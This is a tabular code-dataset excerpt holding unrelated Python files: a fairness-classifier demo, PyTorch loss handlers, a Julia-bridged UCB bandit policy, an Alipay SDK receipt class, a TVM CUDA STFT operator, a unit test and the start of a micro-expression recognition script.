max_stars_repo_path (string, 4-245) | max_stars_repo_name (string, 7-115) | max_stars_count (int64, 101-368k) | id (string, 2-8) | content (string, 6-1.03M) |
---|---|---|---|---|
fairness/algorithms/zafar/fair-classification-master/disparate_impact/synthetic_data_demo/fairness_acc_tradeoff.py | yashwarlord/fairness-comparison | 146 | 12797521 | <reponame>yashwarlord/fairness-comparison
import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a performance measure
def test_synthetic_data():
""" Generate the synthetic data """
X, y, x_control = generate_synthetic_data(plot_data=False)
ut.compute_p_rule(x_control["s1"], y) # compute the p-rule in the original data
""" Classify the data without any constraints """
apply_fairness_constraints = 0
apply_accuracy_constraint = 0
sep_constraint = 0
loss_function = lf._logistic_loss
X = ut.add_intercept(X) # add intercept to X before applying the linear classifier
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)])
print
print "== Unconstrained (original) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now classify such that we achieve perfect fairness """
apply_fairness_constraints = 1
cov_factor = 0
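# Note (added for clarity, not in the original script): a covariance threshold of 0 requests the
# tightest fairness constraint, i.e. zero covariance between the sensitive attribute and the
# signed distance to the decision boundary.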
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])
print
print "== Constrained (fair) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now plot a tradeoff between the fairness and accuracy """
ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])
def main():
test_synthetic_data()
if __name__ == '__main__':
main() |
S2.Surface_Normal/lib/helper.py | leoshine/Spherical_Regression | 133 | 12797551 | <filename>S2.Surface_Normal/lib/helper.py
# coding: utf8
"""
@Author : <NAME>
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
from easydict import EasyDict as edict
from collections import OrderedDict as odict
from itertools import product
def eval_cls(Preds, GTs):
acc = torch.mean((Preds==GTs).float())
return acc.item()
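# Illustrative use (hypothetical tensors): eval_cls(torch.tensor([1, 2, 3]), torch.tensor([1, 0, 3]))
# returns 2/3, the fraction of predictions that match the ground truth.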
class Cross_Entropy_Loss_Handler:
def __init__(self):
self.cross_entropy_loss = nn.CrossEntropyLoss().cuda()
# interface function
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names
GT : dict of ground truth for each target BxHxW
Pred: dict of prediction for each target BxHxWx4
"""
mask = GT['mask']
Loss = edict()
for tgt in tgts:
gt = GT[tgt][mask].view(-1) # as (BxK,)
pr = Pred[tgt][mask].view(gt.size(0),-1) # Pred[tgt][mask] (BxK, 4)
Loss[tgt] = self.cross_entropy_loss(pr, gt).double()
return Loss
class Neg_Dot_Loss_Handler:
def __init__(self):
pass
def compute_loss(self, tgts, Pred, GT):
Loss = edict()
for tgt in tgts:
""" Bug fixed on 22 Aug 2018
torch.dot can only be applied to 1-dim tensor
Don't know why there's no error. """
# Loss[tgt] = torch.mean( -torch.dot(GT[tgt],Pred[tgt]) ) # In fact here only does -GT[tgt]*Pred[tgt]
Loss[tgt] = torch.mean( -torch.sum(GT[tgt]*Pred[tgt], dim=1))
return Loss
class Cos_Proximity_Loss_Handler:
def __init__(self):
self.cos_sim = nn.CosineSimilarity(dim=1).cuda()
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names. In this case has to be tgts=['norm']
GT : dict of ground truth for each target BxHxWx3
Pred: dict of prediction for each target BxHxWx3
"""
mask = GT['mask']
Loss = edict()
Errs = edict()
for tgt in tgts:
cos_sim = self.cos_sim(Pred[tgt][mask], GT[tgt][mask])
Loss[tgt] = torch.mean( 1 - cos_sim ) # use 1 - cos(theta) so the loss is non-negative.
Errs[tgt] = torch.acos(cos_sim.clamp(-1,1))*180./np.pi # .clip(-1,1)
return Loss, Errs
class Smooth_L1_Loss_Handler:
def __init__(self):
self.smooth_l1_loss = nn.SmoothL1Loss().cuda()
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names e.g. tgts=['a', 'e', 't']
GT : dict of ground truth for each target
Pred: dict of prediction for each target
"""
Loss = edict()
for tgt in tgts:
Loss[tgt] = self.smooth_l1_loss(Pred[tgt], GT[tgt]) # [warning] pred first, gt second
return Loss
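# Minimal usage sketch (hypothetical names and shapes, shown for illustration only):
#   handler = Cross_Entropy_Loss_Handler()
#   GT   = dict(mask=mask, norm=gt_bins)      # mask: BxHxW bool, gt_bins: BxHxW long
#   Pred = dict(norm=pred_logits)             # pred_logits: BxHxWx4
#   loss = handler.compute_loss(['norm'], Pred, GT)['norm']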
|
SMPyBandits/Policies/Experimentals/UCBjulia.py | balbok0/SMPyBandits | 309 | 12797558 | <reponame>balbok0/SMPyBandits
# -*- coding: utf-8 -*-
""" The UCB policy for bounded bandits, with UCB indexes computed with Julia.
Reference: [Lai & Robbins, 1985].
.. warning::
Using a Julia function *from* Python will not speed up anything, as there is a lot of overhead in the "bridge" protocol used by pyjulia.
The idea of naively using a tiny Julia function to speed up computations is basically useless.
A naive benchmark showed that in this approach, :class:`UCBjulia` (used within Python) is about 125 times slower (!) than :class:`UCB`.
.. warning:: This is only experimental, and purely useless. See https://github.com/SMPyBandits/SMPyBandits/issues/98
"""
from __future__ import division, print_function # Python 2 compatibility
__author__ = "<NAME>"
__version__ = "0.9"
# WARNING: this is a HUGE hack to fix a mystery bug on importing this policy
from sys import path
from os.path import dirname
path.insert(0, '/'.join(dirname(__file__).split('/')[:-1]))
try:
from .IndexPolicy import IndexPolicy
except ImportError:
from IndexPolicy import IndexPolicy
class UCBjulia(IndexPolicy):
""" The UCB policy for bounded bandits, with UCB indexes computed with Julia.
Reference: [Lai & Robbins, 1985].
.. warning:: This is only experimental, and purely useless. See https://github.com/SMPyBandits/SMPyBandits/issues/98
"""
def __init__(self, nbArms, lower=0., amplitude=1.):
""" Will fail directly if the bridge with julia is unavailable or buggy."""
super(UCBjulia, self).__init__(nbArms, lower=lower, amplitude=amplitude)
self.t = 0
# Importing the julia module and creating the bridge
try:
import julia
except ImportError as e:
print("Error: unable to load the 'julia' Python module. Install with 'pip install julia', or see https://github.com/JuliaPy/pyjulia/") # DEBUG
raise e
_j = julia.Julia()
try:
self._index_function = _j.evalfile("Policies/UCBjulia.jl")
except RuntimeError:
try:
self._index_function = _j.evalfile("UCBjulia.jl")
except RuntimeError:
raise ValueError("Error: Unable to load 'UCBjulia.jl' julia file.") # WARNING
try:
self._index_function([1], [1], 1, 1)
except (RuntimeError, ValueError):
raise ValueError("Error: the index function loaded from 'UCBjulia.jl' is bugged or unavailable.") # WARNING
def computeIndex(self, arm):
r""" Compute the current index, at time t and after :math:`N_k(t)` pulls of arm k:
.. math:: I_k(t) = \frac{X_k(t)}{N_k(t)} + \sqrt{\frac{2 \log(t)}{N_k(t)}}.
"""
# WARNING: the 'arm + 1' part comes from the difference between 0-based indexes
# for Python and the 1-based indexes in Julia. The rest works pretty well!
return self._index_function(self.rewards, self.pulls, self.t, arm + 1)
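# For reference only, the same index computed in plain Python (not used by this class):
#   index = rewards[arm] / pulls[arm] + sqrt(2 * log(t) / pulls[arm])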
|
alipay/aop/api/domain/CollectReceiptOpenApiDTO.py | antopen/alipay-sdk-python-all | 213 | 12797562 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
class CollectReceiptOpenApiDTO(object):
def __init__(self):
self._bsn_no = None
self._bsn_ref_no = None
self._business_scene = None
self._channel = None
self._channel_log_no = None
self._channel_memo = None
self._collect_amt = None
self._collect_date = None
self._collect_status = None
self._collected_amt = None
self._creator = None
self._freeze_amt = None
self._fund_log_id = None
self._gl_exchange_rate = None
self._gmt_create = None
self._gmt_modified = None
self._payee_account_name = None
self._payee_account_no = None
self._payee_inst_id = None
self._payee_ip_role_id = None
self._payer_account_name = None
self._payer_account_no = None
self._payer_bank_branch_name = None
self._payer_inst_id = None
self._payer_ip_role_id = None
self._receipt_no = None
self._ref_trans_no = None
self._ref_trans_no_type = None
self._source = None
self._status = None
self._tnt_inst_id = None
self._used_amt = None
self._writeoff_relative_id = None
@property
def bsn_no(self):
return self._bsn_no
@bsn_no.setter
def bsn_no(self, value):
self._bsn_no = value
@property
def bsn_ref_no(self):
return self._bsn_ref_no
@bsn_ref_no.setter
def bsn_ref_no(self, value):
self._bsn_ref_no = value
@property
def business_scene(self):
return self._business_scene
@business_scene.setter
def business_scene(self, value):
self._business_scene = value
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
self._channel = value
@property
def channel_log_no(self):
return self._channel_log_no
@channel_log_no.setter
def channel_log_no(self, value):
self._channel_log_no = value
@property
def channel_memo(self):
return self._channel_memo
@channel_memo.setter
def channel_memo(self, value):
self._channel_memo = value
@property
def collect_amt(self):
return self._collect_amt
@collect_amt.setter
def collect_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._collect_amt = value
else:
self._collect_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def collect_date(self):
return self._collect_date
@collect_date.setter
def collect_date(self, value):
self._collect_date = value
@property
def collect_status(self):
return self._collect_status
@collect_status.setter
def collect_status(self, value):
self._collect_status = value
@property
def collected_amt(self):
return self._collected_amt
@collected_amt.setter
def collected_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._collected_amt = value
else:
self._collected_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def creator(self):
return self._creator
@creator.setter
def creator(self, value):
self._creator = value
@property
def freeze_amt(self):
return self._freeze_amt
@freeze_amt.setter
def freeze_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._freeze_amt = value
else:
self._freeze_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def fund_log_id(self):
return self._fund_log_id
@fund_log_id.setter
def fund_log_id(self, value):
self._fund_log_id = value
@property
def gl_exchange_rate(self):
return self._gl_exchange_rate
@gl_exchange_rate.setter
def gl_exchange_rate(self, value):
self._gl_exchange_rate = value
@property
def gmt_create(self):
return self._gmt_create
@gmt_create.setter
def gmt_create(self, value):
self._gmt_create = value
@property
def gmt_modified(self):
return self._gmt_modified
@gmt_modified.setter
def gmt_modified(self, value):
self._gmt_modified = value
@property
def payee_account_name(self):
return self._payee_account_name
@payee_account_name.setter
def payee_account_name(self, value):
self._payee_account_name = value
@property
def payee_account_no(self):
return self._payee_account_no
@payee_account_no.setter
def payee_account_no(self, value):
self._payee_account_no = value
@property
def payee_inst_id(self):
return self._payee_inst_id
@payee_inst_id.setter
def payee_inst_id(self, value):
self._payee_inst_id = value
@property
def payee_ip_role_id(self):
return self._payee_ip_role_id
@payee_ip_role_id.setter
def payee_ip_role_id(self, value):
self._payee_ip_role_id = value
@property
def payer_account_name(self):
return self._payer_account_name
@payer_account_name.setter
def payer_account_name(self, value):
self._payer_account_name = value
@property
def payer_account_no(self):
return self._payer_account_no
@payer_account_no.setter
def payer_account_no(self, value):
self._payer_account_no = value
@property
def payer_bank_branch_name(self):
return self._payer_bank_branch_name
@payer_bank_branch_name.setter
def payer_bank_branch_name(self, value):
self._payer_bank_branch_name = value
@property
def payer_inst_id(self):
return self._payer_inst_id
@payer_inst_id.setter
def payer_inst_id(self, value):
self._payer_inst_id = value
@property
def payer_ip_role_id(self):
return self._payer_ip_role_id
@payer_ip_role_id.setter
def payer_ip_role_id(self, value):
self._payer_ip_role_id = value
@property
def receipt_no(self):
return self._receipt_no
@receipt_no.setter
def receipt_no(self, value):
self._receipt_no = value
@property
def ref_trans_no(self):
return self._ref_trans_no
@ref_trans_no.setter
def ref_trans_no(self, value):
self._ref_trans_no = value
@property
def ref_trans_no_type(self):
return self._ref_trans_no_type
@ref_trans_no_type.setter
def ref_trans_no_type(self, value):
self._ref_trans_no_type = value
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def tnt_inst_id(self):
return self._tnt_inst_id
@tnt_inst_id.setter
def tnt_inst_id(self, value):
self._tnt_inst_id = value
@property
def used_amt(self):
return self._used_amt
@used_amt.setter
def used_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._used_amt = value
else:
self._used_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def writeoff_relative_id(self):
return self._writeoff_relative_id
@writeoff_relative_id.setter
def writeoff_relative_id(self, value):
self._writeoff_relative_id = value
def to_alipay_dict(self):
params = dict()
if self.bsn_no:
if hasattr(self.bsn_no, 'to_alipay_dict'):
params['bsn_no'] = self.bsn_no.to_alipay_dict()
else:
params['bsn_no'] = self.bsn_no
if self.bsn_ref_no:
if hasattr(self.bsn_ref_no, 'to_alipay_dict'):
params['bsn_ref_no'] = self.bsn_ref_no.to_alipay_dict()
else:
params['bsn_ref_no'] = self.bsn_ref_no
if self.business_scene:
if hasattr(self.business_scene, 'to_alipay_dict'):
params['business_scene'] = self.business_scene.to_alipay_dict()
else:
params['business_scene'] = self.business_scene
if self.channel:
if hasattr(self.channel, 'to_alipay_dict'):
params['channel'] = self.channel.to_alipay_dict()
else:
params['channel'] = self.channel
if self.channel_log_no:
if hasattr(self.channel_log_no, 'to_alipay_dict'):
params['channel_log_no'] = self.channel_log_no.to_alipay_dict()
else:
params['channel_log_no'] = self.channel_log_no
if self.channel_memo:
if hasattr(self.channel_memo, 'to_alipay_dict'):
params['channel_memo'] = self.channel_memo.to_alipay_dict()
else:
params['channel_memo'] = self.channel_memo
if self.collect_amt:
if hasattr(self.collect_amt, 'to_alipay_dict'):
params['collect_amt'] = self.collect_amt.to_alipay_dict()
else:
params['collect_amt'] = self.collect_amt
if self.collect_date:
if hasattr(self.collect_date, 'to_alipay_dict'):
params['collect_date'] = self.collect_date.to_alipay_dict()
else:
params['collect_date'] = self.collect_date
if self.collect_status:
if hasattr(self.collect_status, 'to_alipay_dict'):
params['collect_status'] = self.collect_status.to_alipay_dict()
else:
params['collect_status'] = self.collect_status
if self.collected_amt:
if hasattr(self.collected_amt, 'to_alipay_dict'):
params['collected_amt'] = self.collected_amt.to_alipay_dict()
else:
params['collected_amt'] = self.collected_amt
if self.creator:
if hasattr(self.creator, 'to_alipay_dict'):
params['creator'] = self.creator.to_alipay_dict()
else:
params['creator'] = self.creator
if self.freeze_amt:
if hasattr(self.freeze_amt, 'to_alipay_dict'):
params['freeze_amt'] = self.freeze_amt.to_alipay_dict()
else:
params['freeze_amt'] = self.freeze_amt
if self.fund_log_id:
if hasattr(self.fund_log_id, 'to_alipay_dict'):
params['fund_log_id'] = self.fund_log_id.to_alipay_dict()
else:
params['fund_log_id'] = self.fund_log_id
if self.gl_exchange_rate:
if hasattr(self.gl_exchange_rate, 'to_alipay_dict'):
params['gl_exchange_rate'] = self.gl_exchange_rate.to_alipay_dict()
else:
params['gl_exchange_rate'] = self.gl_exchange_rate
if self.gmt_create:
if hasattr(self.gmt_create, 'to_alipay_dict'):
params['gmt_create'] = self.gmt_create.to_alipay_dict()
else:
params['gmt_create'] = self.gmt_create
if self.gmt_modified:
if hasattr(self.gmt_modified, 'to_alipay_dict'):
params['gmt_modified'] = self.gmt_modified.to_alipay_dict()
else:
params['gmt_modified'] = self.gmt_modified
if self.payee_account_name:
if hasattr(self.payee_account_name, 'to_alipay_dict'):
params['payee_account_name'] = self.payee_account_name.to_alipay_dict()
else:
params['payee_account_name'] = self.payee_account_name
if self.payee_account_no:
if hasattr(self.payee_account_no, 'to_alipay_dict'):
params['payee_account_no'] = self.payee_account_no.to_alipay_dict()
else:
params['payee_account_no'] = self.payee_account_no
if self.payee_inst_id:
if hasattr(self.payee_inst_id, 'to_alipay_dict'):
params['payee_inst_id'] = self.payee_inst_id.to_alipay_dict()
else:
params['payee_inst_id'] = self.payee_inst_id
if self.payee_ip_role_id:
if hasattr(self.payee_ip_role_id, 'to_alipay_dict'):
params['payee_ip_role_id'] = self.payee_ip_role_id.to_alipay_dict()
else:
params['payee_ip_role_id'] = self.payee_ip_role_id
if self.payer_account_name:
if hasattr(self.payer_account_name, 'to_alipay_dict'):
params['payer_account_name'] = self.payer_account_name.to_alipay_dict()
else:
params['payer_account_name'] = self.payer_account_name
if self.payer_account_no:
if hasattr(self.payer_account_no, 'to_alipay_dict'):
params['payer_account_no'] = self.payer_account_no.to_alipay_dict()
else:
params['payer_account_no'] = self.payer_account_no
if self.payer_bank_branch_name:
if hasattr(self.payer_bank_branch_name, 'to_alipay_dict'):
params['payer_bank_branch_name'] = self.payer_bank_branch_name.to_alipay_dict()
else:
params['payer_bank_branch_name'] = self.payer_bank_branch_name
if self.payer_inst_id:
if hasattr(self.payer_inst_id, 'to_alipay_dict'):
params['payer_inst_id'] = self.payer_inst_id.to_alipay_dict()
else:
params['payer_inst_id'] = self.payer_inst_id
if self.payer_ip_role_id:
if hasattr(self.payer_ip_role_id, 'to_alipay_dict'):
params['payer_ip_role_id'] = self.payer_ip_role_id.to_alipay_dict()
else:
params['payer_ip_role_id'] = self.payer_ip_role_id
if self.receipt_no:
if hasattr(self.receipt_no, 'to_alipay_dict'):
params['receipt_no'] = self.receipt_no.to_alipay_dict()
else:
params['receipt_no'] = self.receipt_no
if self.ref_trans_no:
if hasattr(self.ref_trans_no, 'to_alipay_dict'):
params['ref_trans_no'] = self.ref_trans_no.to_alipay_dict()
else:
params['ref_trans_no'] = self.ref_trans_no
if self.ref_trans_no_type:
if hasattr(self.ref_trans_no_type, 'to_alipay_dict'):
params['ref_trans_no_type'] = self.ref_trans_no_type.to_alipay_dict()
else:
params['ref_trans_no_type'] = self.ref_trans_no_type
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.tnt_inst_id:
if hasattr(self.tnt_inst_id, 'to_alipay_dict'):
params['tnt_inst_id'] = self.tnt_inst_id.to_alipay_dict()
else:
params['tnt_inst_id'] = self.tnt_inst_id
if self.used_amt:
if hasattr(self.used_amt, 'to_alipay_dict'):
params['used_amt'] = self.used_amt.to_alipay_dict()
else:
params['used_amt'] = self.used_amt
if self.writeoff_relative_id:
if hasattr(self.writeoff_relative_id, 'to_alipay_dict'):
params['writeoff_relative_id'] = self.writeoff_relative_id.to_alipay_dict()
else:
params['writeoff_relative_id'] = self.writeoff_relative_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = CollectReceiptOpenApiDTO()
if 'bsn_no' in d:
o.bsn_no = d['bsn_no']
if 'bsn_ref_no' in d:
o.bsn_ref_no = d['bsn_ref_no']
if 'business_scene' in d:
o.business_scene = d['business_scene']
if 'channel' in d:
o.channel = d['channel']
if 'channel_log_no' in d:
o.channel_log_no = d['channel_log_no']
if 'channel_memo' in d:
o.channel_memo = d['channel_memo']
if 'collect_amt' in d:
o.collect_amt = d['collect_amt']
if 'collect_date' in d:
o.collect_date = d['collect_date']
if 'collect_status' in d:
o.collect_status = d['collect_status']
if 'collected_amt' in d:
o.collected_amt = d['collected_amt']
if 'creator' in d:
o.creator = d['creator']
if 'freeze_amt' in d:
o.freeze_amt = d['freeze_amt']
if 'fund_log_id' in d:
o.fund_log_id = d['fund_log_id']
if 'gl_exchange_rate' in d:
o.gl_exchange_rate = d['gl_exchange_rate']
if 'gmt_create' in d:
o.gmt_create = d['gmt_create']
if 'gmt_modified' in d:
o.gmt_modified = d['gmt_modified']
if 'payee_account_name' in d:
o.payee_account_name = d['payee_account_name']
if 'payee_account_no' in d:
o.payee_account_no = d['payee_account_no']
if 'payee_inst_id' in d:
o.payee_inst_id = d['payee_inst_id']
if 'payee_ip_role_id' in d:
o.payee_ip_role_id = d['payee_ip_role_id']
if 'payer_account_name' in d:
o.payer_account_name = d['payer_account_name']
if 'payer_account_no' in d:
o.payer_account_no = d['payer_account_no']
if 'payer_bank_branch_name' in d:
o.payer_bank_branch_name = d['payer_bank_branch_name']
if 'payer_inst_id' in d:
o.payer_inst_id = d['payer_inst_id']
if 'payer_ip_role_id' in d:
o.payer_ip_role_id = d['payer_ip_role_id']
if 'receipt_no' in d:
o.receipt_no = d['receipt_no']
if 'ref_trans_no' in d:
o.ref_trans_no = d['ref_trans_no']
if 'ref_trans_no_type' in d:
o.ref_trans_no_type = d['ref_trans_no_type']
if 'source' in d:
o.source = d['source']
if 'status' in d:
o.status = d['status']
if 'tnt_inst_id' in d:
o.tnt_inst_id = d['tnt_inst_id']
if 'used_amt' in d:
o.used_amt = d['used_amt']
if 'writeoff_relative_id' in d:
o.writeoff_relative_id = d['writeoff_relative_id']
return o
|
python/tvm/topi/cuda/stft.py | shengxinhu/tvm | 4,640 | 12797585 | <gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, too-many-arguments, too-many-nested-blocks, unused-argument
"""STFT operator"""
from math import pi
import tvm
from tvm import te, tir
from ..utils import ceil_div
def _get_max_threads(batch_row):
max_threads = tvm.target.Target.current(allow_none=False).max_num_threads
return tir.min(batch_row, max_threads)
def stft(
data,
n_fft,
hop_length,
win_length,
window,
normalized,
onesided,
output_shape,
):
"""
The STFT computes the Fourier transform of short overlapping windows of the input.
This gives frequency components of the signal as they change over time.
Parameters
----------
data : relay.Expr
Either a 1-D tensor or a 2-D batch tensor.
n_fft : int
The size of Fourier transform
hop_length : int
The distance between neighboring sliding window frames
win_length : int
The size of window frame and STFT filter
window : relay.Expr
A 1-D tensor window frame
normalized : bool
Whether to return the normalized STFT results
onesided : bool
Whether to return onesided result or fill with conjugate symmetry
Returns
-------
output : relay.Expr
Tensor containing the STFT result
Examples
--------
.. code-block:: python
data = [1, 2, 3, 4, 5, 6]
window = [4, 3, 2]
[n_fft, hop_length, win_length, normalized, onesided] = [3, 3, 3, False, True]
relay.stft(data, n_fft, hop_length, win_length, window, normalized, onesided)
-> [[[15.0000, 0.0000], [34.0000, 0.0000]], [[ 4.5000, 0.8660], [ 1.0000, -1.7321]]]
"""
def gen_ir(
data_ptr,
n_fft,
hop_length,
win_length,
window_ptr,
normalized,
onesided,
output_ptr,
):
ib = tir.ir_builder.create()
data = ib.buffer_ptr(data_ptr)
window = ib.buffer_ptr(window_ptr)
output = ib.buffer_ptr(output_ptr)
max_threads = _get_max_threads(output_ptr.shape[0] * output_ptr.shape[1])
output_size = output_ptr.shape[0] * output_ptr.shape[1] * output_ptr.shape[2]
with ib.new_scope():
nthread_tx = max_threads
nthread_bx = ceil_div(output_size, max_threads)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
ib.scope_attr(tx, "thread_extent", nthread_tx)
ib.scope_attr(bx, "thread_extent", nthread_bx)
tid = bx * max_threads + tx
with ib.if_scope(tid < output_size):
matrix_size = output_ptr.shape[1] * output_ptr.shape[2]
batch = tir.floordiv(tid, matrix_size)
row = tir.floordiv(tir.indexmod(tid, matrix_size), output_ptr.shape[2])
col = tir.indexmod(tir.indexmod(tid, matrix_size), output_ptr.shape[2])
output[batch, row, col, 0] = tir.Cast(data_ptr.dtype, 0)
output[batch, row, col, 1] = tir.Cast(data_ptr.dtype, 0)
with ib.for_range(0, win_length) as wlen:
output[batch, row, col, 0] += (
window[wlen]
* data[batch, col * hop_length + wlen]
* tir.cos(2 * pi * row * wlen / win_length)
)
output[batch, row, col, 1] -= (
window[wlen]
* data[batch, col * hop_length + wlen]
* tir.sin(2 * pi * row * wlen / win_length)
)
with ib.if_scope(normalized):
output[batch, row, col, 0] /= tir.sqrt(tir.const(n_fft, "float32"))
output[batch, row, col, 1] /= tir.sqrt(tir.const(n_fft, "float32"))
return ib.get()
output_buf = tir.decl_buffer(output_shape, data.dtype, "output_buf")
return te.extern(
output_shape,
[data, window],
lambda ins, outs: gen_ir(
ins[0], n_fft, hop_length, win_length, ins[1], normalized, onesided, outs[0]
),
dtype=[data.dtype],
out_buffers=[output_buf],
name="stft_cuda",
tag="stft_cuda",
)
|
title_cleaner_test.py | susannahsoon/oldperth | 302 | 12797588 | from nose.tools import *
import title_cleaner
TRUTH = [
(True, 'Manhattan: 1st Ave. - 34th St. E.'),
(True, 'Queens: Hoyt Avenue - 24th Street'),
(False, "Queens: Flushing Meadow Park - New York World's Fair of 1939-40 - [Industrial exhibits.]"),
(False, 'Fifth Avenue - 90th Street, southeast corner'),
(False, 'Recreation and hobbies - Miscellaneous - Children.'),
(True, 'Manhattan: 59th Street - 6th Avenue'),
(True, 'Queens: Queens Boulevard - Junction Boulevard'),
(True, 'Manhattan: 50th Street (West) - 5th Avenue'),
(True, 'Manhattan: 5th Avenue - 78th Street'),
(True, 'Manhattan: 5th Avenue - 33rd Street'),
(True, 'Queens: Queens Boulevard - 62nd Avenue'),
(False, 'Manhattan: Battery Park.'),
(False, 'Manhattan: Central Park - The Sailboat Pool'),
(True, 'Queens: Colonial Avenue - 62nd Drive'),
(True, 'Queens: Woodhaven Blvd - Fleet Street'),
(True, 'Richmond: New Dorp Lane - Cedar Grove Avenue')
]
def test_clean_title():
for correct, title in TRUTH:
assert correct == title_cleaner.is_pure_location(title), '%s %s' % (correct, title)
|
ml-agents/mlagents/envs/__init__.py | icaro56/ml-agents | 134 | 12797620 | from .environment import *
from .brain import *
from .exception import *
|
archive/original_main.py | FDKevin0/Micro-Expression-with-Deep-Learning | 249 | 12797650 | <filename>archive/original_main.py
import numpy as np
import sys
import math
import operator
import csv
import glob,os
import xlrd
import cv2
import pandas as pd
from sklearn.svm import SVC
from collections import Counter
from sklearn.metrics import confusion_matrix
import scipy.io as sio
from keras.models import Sequential
from keras.layers import LSTM, Dense, TimeDistributed
from keras.utils import np_utils
from keras import metrics
from keras import backend as K
from labelling import collectinglabel
from reordering import readinput
from evaluationmatrix import fpr
workplace='/media/ice/OS/Datasets/CASME2_TIM/'
dB="CASME2_TIM"
rootpath = '/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/'
if dB == "CASME2_raw":
inputDir='/media/ice/OS/Datasets/CASME2-RAW/'
resizedFlag=1;
elif dB== "CASME2_large":
inputDir='/media/ice/OS/Datasets/CASME 2/'
wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME 2/CASME2_label_Ver_2.xls');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None)
iD=[str(x.value) for x in colm]
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None)
expression=[str(x.value) for x in colm]
table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str))
subjects=26
samples=246
n_exp=5
resizedFlag=1;
r=68; w=56
VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16]
IgnoredSamples=['sub09/EP13_02','sub09/EP02_02f','sub10/EP13_01','sub17/EP15_01',
'sub17/EP15_03','sub19/EP19_04','sub24/EP10_03','sub24/EP07_01',
'sub24/EP07_04f','sub24/EP02_07','sub26/EP15_01']
listOfIgnoredSamples=[]
for s in range(len(IgnoredSamples)):
if s==0:
listOfIgnoredSamples=[inputDir+IgnoredSamples[s]]
else:
listOfIgnoredSamples.append(inputDir+IgnoredSamples[s])
elif dB== "CASME2_TIM":
inputDir='/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/' #replace with croppoed for testing
wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME2_label_Ver_2.xls');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None)
iD=[str(x.value) for x in colm]
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None)
expression=[str(x.value) for x in colm]
table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str))
# print(type(table))
r=50; w=50
resizedFlag=1;
subjects=26
samples=246
